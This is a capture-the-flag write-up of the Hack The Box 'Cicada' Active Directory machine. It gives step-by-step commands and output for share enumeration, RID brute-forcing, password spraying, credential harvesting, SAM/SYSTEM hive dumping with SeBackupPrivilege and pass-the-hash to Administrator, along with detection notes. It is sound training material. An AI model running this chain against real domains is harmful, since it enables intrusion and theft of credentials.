🪴 Quartz 4.0

HTB - Cicada

May 04, 20269 min read

HTB - Cicada

Target IP: 10.129.231.149 Domain: cicada.htb DC Hostname: CICADA-DC.cicada.htb OS: Windows Server (Domain Controller) Difficulty: Easy Assumed Breach: No — initial access via unauthenticated enumeration Author: [g1nt0n1x]

Ⓩ — zbulim notation: Steps marked with Ⓩ were performed automatically by zbulim, my automated recon tool. They are shown manually here for proof of concept and documentation purposes.

1. Phase 1: Reconnaissance & Information Gathering

1.1 TCP Port Discovery Ⓩ

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
| commonName=CICADA-DC.cicada.htb
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0

| smb2-security-mode:
|_    Message signing enabled and required

Port Analysis & Attack Surface

PortServiceNotes
88/tcpKerberosDomain Controller confirmed
389/tcpLDAPDomain: cicada.htb, DC: CICADA-DC.cicada.htb
445/tcpSMBSigning required — relay attacks blocked
5985/tcpWinRMRemote shell entry point if valid credentials found

Classic AD DC fingerprint. No MSSQL, no web server — pure AD enumeration box.

2. Phase 2: Unauthenticated Enumeration

2.1 Guest Session — Share Enumeration Ⓩ

nxc smb 10.129.231.149 -u 'guest' -p '' --shares
# ADMIN$    NO ACCESS    Remote Admin
# HR        READ         <- Non-standard, interesting
# IPC$      READ         Remote IPC

Guest authentication is enabled. The non-standard HR share is the obvious first target — shares created by admins almost always contain something useful.

2.2 Spider Share Contents Ⓩ

nxc smb 10.129.231.149 -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
# HR/Notice from HR.txt

2.3 Inspect Downloaded File

Notice from HR.txt contents:

"Your default password is: Cicada$M6Corpb*@Lp#nZp!8"

An onboarding notice with a default password left in a publicly readable HR share. We now have a password but no username — we need to enumerate users before we can spray it.

3. Phase 3: User Enumeration via RID Bruteforce

3.1 RID Bruteforce Ⓩ

nxc smb 10.129.231.149 -u 'guest' -p '' --rid-brute
# Administrator
# david.orelious
# emily.oscars
# Guest
# john.smoulder
# michael.wrightson
# sarah.dantelia

RID bruteforcing walks the Security Account Manager (SAM) RID space numerically — querying the domain for the account mapped to RID 500, 501, 502 … up through the high range where regular users sit (1000+). Even with a guest session, the DC responds to these SAMRPC queries, revealing all domain accounts.

This is how we get a user list without null session --users access. Both techniques hit the same underlying SAMR interface; RID bruteforce is just less selective.

4. Phase 4: Password Spray — Default Password

# One password against all users — not username=password, but a known default
nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
# [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

michael.wrightson never changed their onboarding default password. This is the most common outcome of default-password sprays — at least one user in any large enough organisation will have skipped the mandatory change.

5. Phase 5: Credential Harvesting via User Description

With valid credentials, enumerate all domain users including their metadata. AD user objects have a description field that administrators sometimes use to store notes — including passwords.

nxc smb 10.129.231.149 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
# david.orelious    description: Just in case I forget my password is aRt$Lp#7t*VQ!3

A password stored in a user’s AD description field — visible to any authenticated user in the domain. This is surprisingly common; administrators set it “temporarily” and forget about it.

Credentials found: david.orelious:aRt$Lp#7t*VQ!3

6. Phase 6: Share Enumeration with Escalated Credentials

Each new account potentially unlocks different share access. Always re-enumerate shares after gaining a new credential.

nxc smb 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
# DEV    READ    <- Non-standard, new share
nxc smb 10.129.231.149 -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus -o DOWNLOAD_FLAG=True
# DEV/Backup_script.ps1
# Backup_script.ps1 contents:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force

Cleartext credentials hardcoded in a PowerShell backup script stored in a developer share. Scripts that authenticate to other systems (backup jobs, scheduled tasks, sync agents) are a persistent source of credential leakage.

Credentials found: emily.oscars:Q!3@Lp#M6b*7t*Vt

6.1 Validate & Establish Shell

nxc winrm 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
# [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
 
evil-winrm -i 10.129.231.149 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

7. Phase 7: Privilege Escalation — Backup Operators → Administrator

7.1 Enumerate Group Memberships

net user emily.oscars
# Local Group Memberships:   *Backup Operators    *Remote Management Use
# Global Group memberships:  *Domain Users

emily.oscars is a member of Backup Operators — a built-in Windows group that grants two powerful privileges:

whoami /priv
# SeBackupPrivilege     Back up files and directories  Enabled
# SeRestorePrivilege    Restore files and directories  Enabled

7.2 Abuse SeBackupPrivilege — SAM & SYSTEM Hive Dump

SeBackupPrivilege allows reading any file on the system regardless of its DACL, as long as the read is framed as a backup operation. The SAM and SYSTEM registry hives are normally locked and ACL-protected — but with SeBackupPrivilege, reg save can export them freely.

# Export registry hives (bypasses file ACLs via backup semantics)
reg save hklm\sam sam
reg save hklm\system system
 
# Download to Kali via evil-winrm
download sam
download system

7.3 Extract NT Hashes Locally

secretsdump.py -sam sam -system system LOCAL
# [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

The SYSTEM hive contains the boot key used to encrypt the SAM database. secretsdump.py uses the boot key to decrypt the SAM and extract all local account NT hashes.

7.4 Pass the Hash — Administrator

evil-winrm -i 10.129.231.149 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
# whoami
# cicada\administrator

Domain compromised.

Deep Dive: RID Bruteforcing

Every Windows security principal (user, group, computer) is assigned a Relative Identifier (RID) — a numeric suffix that, combined with the domain SID, forms the full Security Identifier (SID). RIDs follow predictable patterns:

RIDAccount
500Built-in Administrator
501Guest
502krbtgt
512Domain Admins (group)
1000+Regular user accounts (sequential)

RID bruteforcing works by querying the SAMR interface for each RID in turn and recording which ones resolve to an account name. Even a guest session can trigger these queries on many DCs, because SAMR was designed for directory enumeration and many environments leave it accessible to authenticated (or even guest) connections.

Why it works when --users doesn’t: The --users flag uses a different SAMR call (SamrEnumerateUsersInDomain) that may require higher privileges. RID bruteforce uses SamrLookupIdsInDomain with explicit RID values — a subtly different call that sometimes has weaker access controls.

Detection: Rapid sequential SAMR lookups (Event ID 4661 or Netlogon logging) from a guest account are a reliable detection signal.

Deep Dive: Credentials in AD User Descriptions

The AD description attribute on user objects is readable by any authenticated domain user — it is not protected by default. Administrators often use it for notes, asset tags, or “temporary” reminders. Because it’s not a sensitive field by design, it is almost never audited or reviewed.

Common patterns to look for in descriptions:

  • "pw: <password>" — literal password note
  • "Just in case I forget my password is ..." — this box
  • "Temp pass: <password>, change on first login" — provisioning notes never cleaned up
  • "Service account — contact <admin> for password" — sometimes the password itself follows

How to enumerate at scale:

# Via nxc — shows description column in --users output
nxc smb <target> -u <user> -p <pass> --users
 
# Via ldapsearch — dumps all descriptions directly
ldapsearch -x -H ldap://<dc> -D '<user>@<domain>' -w '<pass>' \
    -b 'DC=domain,DC=local' '(description=*)' sAMAccountName description

Always check descriptions after gaining any new credential — the field is queried once and easy to miss if you’re only looking at group memberships.

Deep Dive: Backup Operators & SeBackupPrivilege

The Backup Operators group exists so that backup software can read every file on the system without needing to be a full Administrator. It grants two privileges:

PrivilegeWhat it enables
SeBackupPrivilegeRead any file/registry key regardless of DACL, using backup semantics (FILE_FLAG_BACKUP_SEMANTICS)
SeRestorePrivilegeWrite any file/registry key regardless of DACL

From an attacker’s perspective, SeBackupPrivilege on a Domain Controller is effectively Domain Admin:

  1. SAM + SYSTEM hive dump (this box) — extract local Administrator NT hash → Pass-the-Hash
  2. NTDS.dit copy — the live database is locked, but SeBackupPrivilege allows using diskshadow or robocopy /B to copy it, then extract all domain hashes with secretsdump.py
  3. File read — read any sensitive file (SSH keys, configuration files, other credentials)

Why reg save works: The reg save command internally opens the registry hive with FILE_FLAG_BACKUP_SEMANTICS, which bypasses the DACL check and uses the privilege check instead. Windows specifically designed this so backup software can export the registry.

Why this is loud: reg save hklm\sam is a well-known attack technique and is detected by virtually all EDR products. For stealth, the NTDS.dit + diskshadow approach with a volume shadow copy is harder to detect, but more complex to execute.

Detection: Event ID 4656 (object access with SeBackupPrivilege) and Event ID 4670 (permissions on an object changed using backup privilege) are the key signals.

Key Takeaways & Checklist

  • Always check non-standard shares first — HR, DEV, IT, Backup are admin-created and almost always contain something
  • When you have a password but no username, enumerate users via RID bruteforce before spraying
  • After every new credential, re-enumerate shares — each account has different access rights
  • Check the AD description field on all user objects with --users — passwords stored there are common
  • Scripts in developer shares (DEV, IT, Scripts) frequently hardcode credentials for automation tasks
  • Backup Operators membership = SeBackupPrivilege = read any file on the DC = SAM/NTDS dump
  • reg save hklm\sam + reg save hklm\systemsecretsdump.py LOCAL is the fastest Backup Operators exploit
  • The HR → DEV share chain is a pattern: follow non-standard shares at every privilege level

Graph View

Backlinks